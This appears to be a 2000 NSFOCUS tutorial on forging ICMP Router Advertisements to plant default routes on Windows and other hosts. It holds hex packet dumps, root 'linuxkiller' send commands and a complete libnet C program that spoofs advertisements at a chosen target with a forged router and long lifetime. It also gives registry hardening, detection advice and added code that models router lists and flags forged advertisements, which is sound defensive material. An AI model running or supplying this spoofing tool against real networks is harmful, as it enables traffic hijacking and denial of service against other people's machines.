Example of using libnet (11)
Author: ADAM (mailto:adam@nsfocus.com)
Compiled by: scz (mailto:scz@nsfocus.com)
Home page: http://www.nsfocus.com
Date: 2000-09-12

It was once thought that, apart from ICMP Redirect, no other ICMP message type could remotely affect a routing table; after days of being tortured by IPXODI it turned out that such ICMP packets can do great damage. RFC 1256 defines the ICMP Router Solicitation and Router Advertisement messages. If a host has router discovery enabled, it may broadcast a Router Solicitation when it starts up, and routers that implement router discovery reply with Router Advertisements. Even if the host never sends a solicitation, its routing table is still affected by the Router Advertisements that routers send on their own. A Router Advertisement creates a default route in the host's routing table. The lifetime of that route is generally 30 minutes, while a router sends advertisements on its own initiative roughly every 10 minutes, which in practice means the default route created this way never expires.
--------------------------------------------------------------------------
The following is an example of an ICMP Router Solicitation packet:

FF FF FF FF FF FF 00 00 00 11 11 11 08 00 45 00 00 1C 00 00 00 00 40 01
F1 36 C0 A8 08 5A C0 A8 FF FF 0A 00 F5 FF 00 00 00 00

FF FF FF FF FF FF   Destination MAC (broadcast)
00 00 00 11 11 11   Source MAC (the soliciting host)
45 00 00 1C ...     IP header, total length 28 (20 + 8), TTL 0x40, protocol 1 (ICMP)
C0 A8 08 5A         Source IP, 192.168.8.90
C0 A8 FF FF         Destination IP, 192.168.255.255 (broadcast)
0A                  Type = 10
00                  Code = 0
F5 FF               Checksum = 0xF5FF
00 00 00 00         Unused (zero)

Save the packet above in the file routerselection.txt and run the following command as root:

./linuxkiller -k routerselection.txt -w 5 -r 1000
--------------------------------------------------------------------------
The following is an example of an ICMP Router Advertisement packet:

00 00 00 11 11 11 00 00 00 22 22 22 08 00 45 00 00 24 12 34 00 00 ff 01
15 aa c0 a8 0a 50 c0 a8 08 5a 09 00 aa fb 01 02 7f ff c0 a8 0a 5a 00 00
00 00

00 00 00 11 11 11   Destination MAC (the target host)
00 00 00 22 22 22   Source MAC; this can be filled in arbitrarily, but must not be the destination MAC
08 00               IP protocol
45 00 00 24         Version/IHL, TOS, total length 36 (20 + 16)
12 34               ID
00 00               Flags / fragment offset
ff                  TTL
01                  ICMP protocol
15 aa               Checksum = 0x15AA
c0 a8 0a 50         Source IP, 192.168.10.80
c0 a8 08 5a         Destination IP, 192.168.8.90
09                  Type = 9
00                  Code = 0
aa fb               Checksum = 0xAAFB
01                  Number of addresses
02                  Address entry size, fixed at 2 (two 32-bit words)
7f ff               Lifetime: how long the entry stays valid in the target host's routing table, in seconds; an expired entry is deleted
c0 a8 0a 5a         Router address (192.168.10.90)
00 00 00 00         Preference level; the larger the value, the higher the preference; 0x80000000 means this router address must not be used as the default route

Save the packet above in the file routeradvertisement.txt and run the following command as root:

./linuxkiller -k routeradvertisement.txt -w 5 -r 1000
--------------------------------------------------------------------------

A router does not send Router Advertisements on a strict schedule but at random intervals, to avoid colliding with other routers; the interval between two advertisements is generally 450 to 600 seconds, i.e. about 10 minutes, and the lifetime carried in the advertisement is generally 30 minutes (1800 seconds). The lifetime has one further use: if a router interface is about to go down, the router can send a last Router Advertisement on that interface with the lifetime set to zero. If there are several routers on a subnet, the system administrator configures which of them send Router Advertisements. These two ICMP message types are relatively new and not all systems support them. On Solaris 2.x, /usr/sbin/in.rdisc is the daemon that supports them; see its man page for details. When Microsoft Win9x or Win2K runs the DHCP client, ICMP router discovery is enabled by default. By forging Router Advertisements it is therefore possible to add a default route on a DHCP client that ranks higher than the default route obtained from the DHCP server. On Win2K the default route added by a Router Advertisement has a lower priority than the default route from the DHCP server, so the attack is less harmful there, but because it still changes the routing table, a DoS is possible. With ADAM's help, the corresponding registry information was found:

--------------------------------------------------------------------------
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2FF4FAFD-40EC-4723-9FD0-86BFCBE0975B}
(This is the interface name. Your system will obviously not use this name; you need to determine it yourself.)

PerformRouterDiscovery   REG_DWORD

Value   Meaning
0       Disable router discovery
1       Enable router discovery (see RFC 1256)
--------------------------------------------------------------------------

(Windows 2000 also accepts the value 2, which enables router discovery only when the DHCP server sends the Perform Router Discovery option; that is how DHCP clients end up with it on.) We suspect that router discovery can be enabled through this value even without starting the DHCP Client, which in turn means that ICMP Router Advertisements will affect the host's routing table.
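The host-side bookkeeping that the advertisement fields above drive (lifetime, re-advertisement interval, preference level and the 0x80000000 sentinel) is easiest to see in code. The following is an added example written for this page, not code from the original article or from libnet: a minimal model of the default router list an RFC 1256 host keeps, exercised with a scenario built from the dump above. 192.168.8.1 as the legitimate router is an assumed address; 192.168.10.90 is the router address from the forged advertisement.

```c
/* Added example for this page (not from the original article or libnet):
 * a minimal model of the default router list an RFC 1256 host keeps, driven
 * by the fields of a Router Advertisement: router address, preference level
 * and lifetime. 192.168.8.1 is an assumed legitimate router; 192.168.10.90
 * is the router address from the forged advertisement in the dump. */
#include <stdint.h>
#include <stdio.h>

#define MAX_ROUTERS   4
#define PREF_UNUSABLE ((int32_t)0x80000000)   /* RFC 1256: never use as default */

struct router_entry {
    uint32_t addr;      /* router address, host byte order */
    int32_t  pref;      /* preference level, signed two's complement per RFC 1256 */
    uint32_t expires;   /* absolute time (s) at which the entry dies */
    int      used;
};
struct router_list { struct router_entry e[MAX_ROUTERS]; };

/* Apply one advertised (address, preference, lifetime) received at `now`.
 * Lifetime 0 withdraws the address; otherwise the entry is added or
 * refreshed and its expiry pushed out to now + lifetime.
 * Returns 1 if the list changed, 0 if a withdrawal matched nothing,
 * -1 if the list is full. */
int rl_update(struct router_list *l, uint32_t addr, int32_t pref,
              uint16_t lifetime, uint32_t now)
{
    int i, slot = -1;
    for (i = 0; i < MAX_ROUTERS; i++)
        if (l->e[i].used && l->e[i].addr == addr) { slot = i; break; }
    if (lifetime == 0) {                      /* router announcing it is going away */
        if (slot < 0) return 0;
        l->e[slot].used = 0;
        return 1;
    }
    if (slot < 0)
        for (i = 0; i < MAX_ROUTERS; i++)
            if (!l->e[i].used) { slot = i; break; }
    if (slot < 0) return -1;
    l->e[slot].used = 1;
    l->e[slot].addr = addr;
    l->e[slot].pref = pref;
    l->e[slot].expires = now + lifetime;
    return 1;
}

/* Drop entries whose lifetime has run out. */
void rl_expire(struct router_list *l, uint32_t now)
{
    int i;
    for (i = 0; i < MAX_ROUTERS; i++)
        if (l->e[i].used && now >= l->e[i].expires) l->e[i].used = 0;
}

/* The default router: highest preference among live, usable entries; 0 if none. */
uint32_t rl_default_router(struct router_list *l, uint32_t now)
{
    int i, best = -1;
    rl_expire(l, now);
    for (i = 0; i < MAX_ROUTERS; i++) {
        if (!l->e[i].used || l->e[i].pref == PREF_UNUSABLE) continue;
        if (best < 0 || l->e[i].pref > l->e[best].pref) best = i;
    }
    return best < 0 ? 0 : l->e[best].addr;
}

static void show(const char *what, uint32_t ip)
{
    printf("%-44s default router = %u.%u.%u.%u\n", what, (unsigned)(ip >> 24),
           (unsigned)((ip >> 16) & 0xFF), (unsigned)((ip >> 8) & 0xFF), (unsigned)(ip & 0xFF));
}

int main(void)
{
    const uint32_t legit  = 0xC0A80801UL;   /* 192.168.8.1, assumed */
    const uint32_t forged = 0xC0A80A5AUL;   /* 192.168.10.90, from the dump */
    struct router_list l = { { { 0, 0, 0, 0 } } };
    uint32_t t;
    /* real router: lifetime 1800 s, re-advertised every 600 s, so it never expires */
    for (t = 0; t <= 1200; t += 600) rl_update(&l, legit, 0, 1800, t);
    show("t=2500, legit refreshed at 0/600/1200:", rl_default_router(&l, 2500));
    /* forged advertisement with a higher preference and a huge lifetime */
    rl_update(&l, forged, 1, 0x7FFF, 2600);
    show("t=2700, forged pref 1 lifetime 0x7FFF:", rl_default_router(&l, 2700));
    /* lifetime 0 withdraws the forged router again */
    rl_update(&l, forged, 1, 0, 2800);
    show("t=2800, forged withdrawn with lifetime 0:", rl_default_router(&l, 2800));
    return 0;
}
```

The preference is compared as a signed value, which is what RFC 1256 specifies and why 0x80000000 sorts below every other preference; the model excludes it outright rather than letting it win when it is the only entry. The scenario in main() shows the three behaviours the text describes: a 1800 s lifetime refreshed every 600 s never lapses, a forged entry with a higher preference displaces the legitimate default router, and a lifetime of zero withdraws it.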
ADAM set this value on a Chinese Windows 2000 AD Server and rebooted; I then built an ICMP Router Advertisement like the one in the example above on another Windows 98 machine, and the result was a default route in ADAM's host routing table, but with a metric as high as 1000, which in practice means it has little chance of affecting the IP packets ADAM's host sends. By contrast, the route added by an ICMP Redirect is a specific host route with a fairly high priority; note the difference in the final effect. The source IP of an ICMP Router Advertisement is not required to exist, nor does it have to be one of the currently valid routes, and there are not many restrictions on the router IP either, so it is easier to forge than an ICMP Redirect. The Shuimu Tsinghua network board has discussed many DHCP problems; DHCP is used there on a large scale, which also provides a good large-scale test environment for this attack. In fact, a host configured with the DHCP Client can disable the router discovery function through the registry value above without affecting any other feature of the DHCP Client. By the way, here is a solution to the ICMP host route (Redirect) problem: in a simple LAN there is no reason whatsoever to enable this feature, so the solution is to disable it. The following is from the registry of a Chinese Windows 2000 Server.
--------------------------------------------------------------------------
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

EnableICMPRedirect   REG_DWORD

Value   Meaning
0       Disable ICMP Redirect
1       Allow ICMP Redirect (the default)
--------------------------------------------------------------------------

Regrettably, for lack of a test environment, the corresponding two registry settings under PWIN98 were not tracked down, but I am sure they exist.

How to detect and prevent ICMP Router Advertisement attacks? Looking at the routing table is the most direct way. Note that, unlike the ICMP Redirect attack, this attack cannot be detected with netstat -s, because the kernel keeps no corresponding statistic. Protocol analysers, IDS and the like can easily spot an attempt at this attack. Use a firewall to restrict ICMP Router Advertisement messages. Adjust the settings of individual hosts according to the specific situation.

The author of libnet was not forward-looking enough to accept this newcomer, and man libnet shows no corresponding packet-building function, so we must construct the ICMP Router Advertisement ourselves in the IP data area. All functions involved have been introduced earlier in this series and are not repeated here. The command line specifies the forged source IP (may be randomised), the attack target IP, the forged router IP (randomising it is not considered, as it makes little sense; if you specify it, use a directly connected router), and the number of ICMP Router Advertisement messages to send.

--------------------------------------------------------------------------
/*
 * File: ICMP Router Advertisement Program for i386/Linux using libnet
 * Version: 0.99 Alpha
 * Author: SCZ
 */
#include <libnet.h>   /* programs that use libnet must include this header */
#include <getopt.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/***********************************************************************
 ** Macro definitions                                                 **
 ***********************************************************************/
#define SUCCESS           0
#define FAILURE          -1
#define DEFAULTIRANUMBER  5        /* default number of ICMP router advertisements to send */
#define DEFAULTTTL        0x7FFF   /* default lifetime (seconds) */
#define DEFAULTLEVEL      0        /* default preference level */
#define longoptionchar    'L'      /* value getopt_long returns for every long option */

/***********************************************************************
 ** Global variables                                                  **
 ***********************************************************************/
/* Used to initialise the pseudo random number generator */
u_long randomstate[64] = {
    0x00000003, 0x32d9c024, 0x9b663182, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0, 0xab5c5918, 0x946554fd,
    0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88, 0xe369735d, 0x904f35f7,
    0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5, 0xf103bc02, 0x48f340fb,
    0x36413f93, 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b, 0x27fb47b9, 0x9a319039,
    0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a, 0x8088e080, 0x02800004,
    0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000, 0x94100003, 0xd60a0000,
    0x90022001, 0x840ae07f, 0x85288003, 0x94128002, 0x808ae080, 0x12bffa,   0x8600e007, 0x80a0e01f,
    0x18800006, 0x808ae040, 0x02800004, 0x84103fff, 0x85288003, 0x94128002, 0x81c3e008, 0xd4224000
};

size_t  ipdatasize;
u_char *packet = NULL;               /* ICMP router advertisement packet, with payload */
size_t  packet_size = LIBNET_IP_H;
int     rawsocket;

/***********************************************************************
 ** Function prototypes                                               **
 ***********************************************************************/
void Libnet_do_checksum(u_char *buf, int protocol, int len);
void Libnet_init_packet(size_t p_size, u_char **buf);
int  Libnet_open_raw_sock(int protocol);
void Libnet_write_ip(int sock, u_char *packet, int len);
void IRAsend(u_long srcip, u_long dstip, u_long routeip, u_long iranumber);
void usage(char *arg);

/* ------------------------------------------------------------------- */
void Libnet_do_checksum(u_char *buf, int protocol, int len)
{
    if (libnet_do_checksum(buf, protocol, len) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
    }
    return;
}  /* end of Libnet_do_checksum */

void Libnet_init_packet(size_t p_size, u_char **buf)
{
    if (libnet_init_packet(p_size, buf) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "Can't initialize packet\n");
    }
    return;
}  /* end of Libnet_init_packet */

int Libnet_open_raw_sock(int protocol)
{
    int s;
    if ((s = libnet_open_raw_sock(protocol)) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "Can't open raw socket for protocol %08x\n", protocol);
    }
    return (s);
}  /* end of Libnet_open_raw_sock */

void Libnet_write_ip(int sock, u_char *packet, int len)
{
    int w;
    if ((w = libnet_write_ip(sock, packet, len)) < len) {
        libnet_error(LIBNET_ERR_FATAL, "libnet_write_ip only wrote %d of %d bytes\n", w, len);
    }
    return;
}  /* end of Libnet_write_ip */

/* Send iranumber ICMP router advertisements from srcip to dstip. The ICMP
 * payload (advertising routeip) has already been filled in by main(); this
 * function only prepends the IP header, computes the ICMP checksum and writes
 * the packet. The body of this function is missing from the surviving copy of
 * the article and is reconstructed here from its prototype and the libnet
 * calls introduced earlier in the series. */
void IRAsend(u_long srcip, u_long dstip, u_long routeip, u_long iranumber)
{
    u_long i;
    struct in_addr ra;
    /* IP header: TTL 255 as real router advertisements use; the IP checksum
     * is filled in by the kernel on a raw socket, the ICMP one by us */
    libnet_build_ip(ipdatasize, 0, (u_short)(random() & 0xFFFF), 0, 255, IPPROTO_ICMP,
                    srcip, dstip, NULL, 0, packet);
    Libnet_do_checksum(packet, IPPROTO_ICMP, ipdatasize);
    ra.s_addr = (uint32_t)routeip;
    fprintf(stderr, "advertising router %s, %lu packet(s)\n", inet_ntoa(ra), iranumber);
    for (i = 0; i < iranumber; i++) {
        Libnet_write_ip(rawsocket, packet, packet_size);
    }
    return;
}  /* end of IRAsend */

void usage(char *arg)
{
    fprintf(stderr, "Usage: %s --di <target ip> [--si <source ip>] [--routeip <router ip>]\n"
                    "          [--num <packets>] [--ttl <lifetime seconds>] [--level <preference>]\n",
            arg);
    exit(FAILURE);
}  /* end of usage */

int main(int argc, char *argv[])
{
    struct option longoption[] = {
        {"si",      1, 0, longoptionchar},   /* source ip */
        {"di",      1, 0, longoptionchar},   /* attack target ip */
        {"routeip", 1, 0, longoptionchar},   /* forged router ip */
        {"num",     1, 0, longoptionchar},   /* number of ICMP packets */
        {"ttl",     1, 0, longoptionchar},   /* lifetime */
        {"level",   1, 0, longoptionchar},   /* preference level */
        {0, 0, 0, 0}
    };
    int longoptionindex = 0;               /* used when processing long options */
    /* IPs are kept in network byte order; 0xFFFFFFFF means "not given" */
    u_long srcip   = 0xFFFFFFFF;           /* forged source IP, i.e. the "router" */
    u_long dstip   = 0xFFFFFFFF;           /* the prey */
    u_long routeip = 0xFFFFFFFF;           /* forged router IP */
    u_long iranumber = DEFAULTIRANUMBER;   /* number of ICMP router advertisements */
    unsigned int randomseed = (unsigned int)time(NULL);
    int c;
    u_char   *ipdata;
    uint32_t *tempulong;                   /* 32-bit so in-packet fields are written with the right width */
    u_short  *tempushort;
    u_short ttl   = DEFAULTTTL;            /* lifetime */
    u_long  level = DEFAULTLEVEL;          /* preference level */

    if (argc == 1) {
        usage(argv[0]);
    }
    initstate(randomseed, (char *)randomstate, 128);
    setstate((char *)randomstate);
    opterr = 0;   /* don't want getopt() writing to stderr */
    while ((c = getopt_long(argc, argv, "h", longoption, &longoptionindex)) != EOF) {
        switch (c) {
        case longoptionchar:   /* process long options */
            if (optarg) {
                switch (longoptionindex) {
                case 0:   /* return value is in big-endian (network) order */
                    srcip = libnet_name_resolve((u_char *)optarg, LIBNET_DONT_RESOLVE);
                    if (srcip == (u_long)-1) {
                        libnet_error(LIBNET_ERR_FATAL, "Bad srcip: %s\n", optarg);
                    }
                    break;
                case 1:   /* return value is in big-endian (network) order */
                    dstip = libnet_name_resolve((u_char *)optarg, LIBNET_DONT_RESOLVE);
                    if (dstip == (u_long)-1) {
                        libnet_error(LIBNET_ERR_FATAL, "Bad dstip: %s\n", optarg);
                    }
                    break;
                case 2:   /* return value is in big-endian (network) order */
                    routeip = libnet_name_resolve((u_char *)optarg, LIBNET_DONT_RESOLVE);
                    if (routeip == (u_long)-1) {
                        libnet_error(LIBNET_ERR_FATAL, "Bad routeip: %s\n", optarg);
                    }
                    break;
                case 3:   /* decimal */
                    iranumber = (u_long)strtoul(optarg, NULL, 10);
                    if (iranumber == 0) {
                        fprintf(stderr, "check your iranumber\n");
                        exit(FAILURE);
                    }
                    break;
                case 4:   /* decimal */
                    ttl = (u_short)strtoul(optarg, NULL, 10);
                    break;
                case 5:   /* decimal */
                    level = (u_long)strtoul(optarg, NULL, 10);
                    break;
                default:
                    break;
                }  /* end of switch */
            }
            break;
        case 'h':
        case '?':
            usage(argv[0]);
        }  /* end of switch */
    }  /* end of while */

    /* if srcip was not specified, randomise it */
    if (srcip == 0xFFFFFFFF) {
        srcip = (u_long)random();
    }
    if (dstip == 0xFFFFFFFF) {
        fprintf(stderr, "check your dstip\n");
        exit(FAILURE);
    }
    /* routeip is not meant to be randomised; try to specify a directly
     * connected router, although that is not mandatory */
    if (routeip == 0xFFFFFFFF) {
        routeip = (u_long)random();
    }
    ipdatasize = 16;
    packet_size += ipdatasize;
    fprintf(stderr, "[ ICMP Router Advertising ... ]\n");
    /* allocate memory and zero it */
    Libnet_init_packet(packet_size, &packet);
    /* fill in the ICMP router advertisement here */
    ipdata = packet + LIBNET_IP_H;
    ipdata[0] = 0x09;   /* ICMP router advertisement */
    ipdata[1] = 0x00;   /* code; the checksum in ipdata[2..3] is computed later by Libnet_do_checksum */
    ipdata[4] = 0x01;   /* number of addresses */
    ipdata[5] = 0x02;   /* address entry size, fixed at 2 */
    tempushort = (u_short *)(ipdata + 6);
    *tempushort = htons(ttl);               /* lifetime */
    tempulong = (uint32_t *)(ipdata + 8);
    *tempulong = (uint32_t)routeip;         /* router address, already in network order */
    tempulong = (uint32_t *)(ipdata + 12);
    *tempulong = htonl((uint32_t)level);    /* preference level */
    /* create the raw socket */
    rawsocket = Libnet_open_raw_sock(IPPROTO_RAW);
    IRAsend(srcip, dstip, routeip, iranumber);
    libnet_close_raw_sock(rawsocket);
    libnet_destroy_packet(&packet);
    return (SUCCESS);
}  /* end of main */
--------------------------------------------------------------------------
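For the detection side discussed above (a protocol analyser or IDS picking Router Advertisements out of traffic), here is an added example, not part of the original article, of linuxkiller or of libnet: it decodes a raw Ethernet frame as an RFC 1256 Router Advertisement, verifies both the IP header checksum and the ICMP checksum, and then scores the advertisement against a small policy: every advertised router must be a known router, must be on the local link, and the advertisement must come from that router's own address. The two embedded frames are the solicitation and advertisement dumps from earlier on this page; the known-router list (192.168.8.1) and the local network (192.168.0.0/16, taken from the broadcast address the solicitation uses) are assumptions.

```c
/* Added example for this page (not from the original article, linuxkiller
 * or libnet): parse and validate an ICMP Router Advertisement (RFC 1256)
 * from a raw Ethernet frame, then check it against an IDS-style policy. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RA_MAX_ENTRIES 8

/* Reasons an advertisement looks forged (bitmask from router_adv_suspicious) */
enum { RA_UNKNOWN_ROUTER = 1, RA_SRC_NOT_ROUTER = 2, RA_OFF_LINK = 4 };

struct ra_entry { uint32_t router; uint32_t pref; };
struct ra_info {
    uint32_t src_ip, dst_ip;              /* host byte order */
    uint16_t lifetime;                    /* seconds */
    int num_addrs;
    struct ra_entry entry[RA_MAX_ENTRIES];
};

/* The page's two dumps as byte arrays: Router Solicitation and Router Advertisement. */
static const uint8_t sol_frame[] = {
    0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 0x00,0x00,0x00,0x11,0x11,0x11, 0x08,0x00,
    0x45,0x00,0x00,0x1C, 0x00,0x00,0x00,0x00, 0x40,0x01,0xF1,0x36,
    0xC0,0xA8,0x08,0x5A, 0xC0,0xA8,0xFF,0xFF, 0x0A,0x00,0xF5,0xFF, 0x00,0x00,0x00,0x00 };
static const uint8_t adv_frame[] = {
    0x00,0x00,0x00,0x11,0x11,0x11, 0x00,0x00,0x00,0x22,0x22,0x22, 0x08,0x00,
    0x45,0x00,0x00,0x24, 0x12,0x34,0x00,0x00, 0xFF,0x01,0x15,0xAA,
    0xC0,0xA8,0x0A,0x50, 0xC0,0xA8,0x08,0x5A, 0x09,0x00,0xAA,0xFB, 0x01,0x02,0x7F,0xFF,
    0xC0,0xA8,0x0A,0x5A, 0x00,0x00,0x00,0x00 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* RFC 1071 Internet checksum; yields 0 over data that already contains a valid checksum. */
uint16_t inet_cksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) { sum += rd16(p); p += 2; len -= 2; }
    if (len) sum += (uint32_t)p[0] << 8;
    while (sum >> 16) sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Returns 0 and fills *out for a well-formed Router Advertisement; a negative
 * code says which check failed (-3: IP checksum, -6: ICMP checksum, -7: not type 9). */
int parse_router_adv(const uint8_t *frame, size_t len, struct ra_info *out)
{
    const uint8_t *ip, *icmp;
    size_t ihl, tot, ilen;
    int i;
    if (len < 14 + 20 || rd16(frame + 12) != 0x0800) return -1;   /* not IPv4 over Ethernet */
    ip  = frame + 14;
    ihl = (size_t)(ip[0] & 0x0F) * 4;
    tot = rd16(ip + 2);
    if ((ip[0] >> 4) != 4 || ihl < 20 || tot < ihl || tot > len - 14) return -2;
    if (inet_cksum(ip, ihl) != 0) return -3;                      /* IP header checksum */
    if (ip[9] != 1) return -4;                                    /* not ICMP */
    icmp = ip + ihl;
    ilen = tot - ihl;
    if (ilen < 8) return -5;
    if (inet_cksum(icmp, ilen) != 0) return -6;                   /* ICMP checksum */
    if (icmp[0] != 9 || icmp[1] != 0) return -7;                  /* not a Router Advertisement */
    if (icmp[5] != 2) return -8;                                  /* entry size must be 2 words */
    if (icmp[4] > RA_MAX_ENTRIES || ilen < 8 + (size_t)icmp[4] * 8) return -9;
    memset(out, 0, sizeof *out);
    out->src_ip = rd32(ip + 12);
    out->dst_ip = rd32(ip + 16);
    out->num_addrs = icmp[4];
    out->lifetime = rd16(icmp + 6);
    for (i = 0; i < out->num_addrs; i++) {
        out->entry[i].router = rd32(icmp + 8 + i * 8);
        out->entry[i].pref   = rd32(icmp + 12 + i * 8);
    }
    return 0;
}

/* Policy: bitmask of reasons the advertisement looks forged; 0 means clean. */
int router_adv_suspicious(const struct ra_info *ra, const uint32_t *known, int nknown,
                          uint32_t local_net, uint32_t local_mask)
{
    int reasons = 0, i, j, src_is_router = 0;
    for (i = 0; i < ra->num_addrs; i++) {
        int found = 0;
        for (j = 0; j < nknown; j++) if (known[j] == ra->entry[i].router) found = 1;
        if (!found) reasons |= RA_UNKNOWN_ROUTER;
        if ((ra->entry[i].router & local_mask) != local_net) reasons |= RA_OFF_LINK;
        if (ra->entry[i].router == ra->src_ip) src_is_router = 1;
    }
    if (!src_is_router) reasons |= RA_SRC_NOT_ROUTER;   /* RFC 1256: source is one of the router's addresses */
    return reasons;
}

int main(void)
{
    struct ra_info ra;
    const uint32_t known[] = { 0xC0A80801UL };   /* assumed legitimate router 192.168.8.1 */
    int rc = parse_router_adv(adv_frame, sizeof adv_frame, &ra);
    if (rc != 0) { printf("not a valid router advertisement (%d)\n", rc); return 1; }
    printf("RA from %08x to %08x: lifetime %u s, router %08x pref %u\n", ra.src_ip, ra.dst_ip,
           (unsigned)ra.lifetime, ra.entry[0].router, ra.entry[0].pref);
    printf("suspicious reasons = 0x%x\n",
           router_adv_suspicious(&ra, known, 1, 0xC0A80000UL, 0xFFFF0000UL));
    return 0;
}
```

Run against the page's advertisement, the parser accepts it (both checksums in the dump are correct) and the policy flags it twice: 192.168.10.90 is not a known router, and the advertisement was sent from 192.168.10.80 rather than from the router address it advertises, which is exactly the freedom the text says makes these packets easy to forge. The solicitation is rejected as type 10, and flipping any byte of either header is caught by the corresponding checksum check before the policy is consulted.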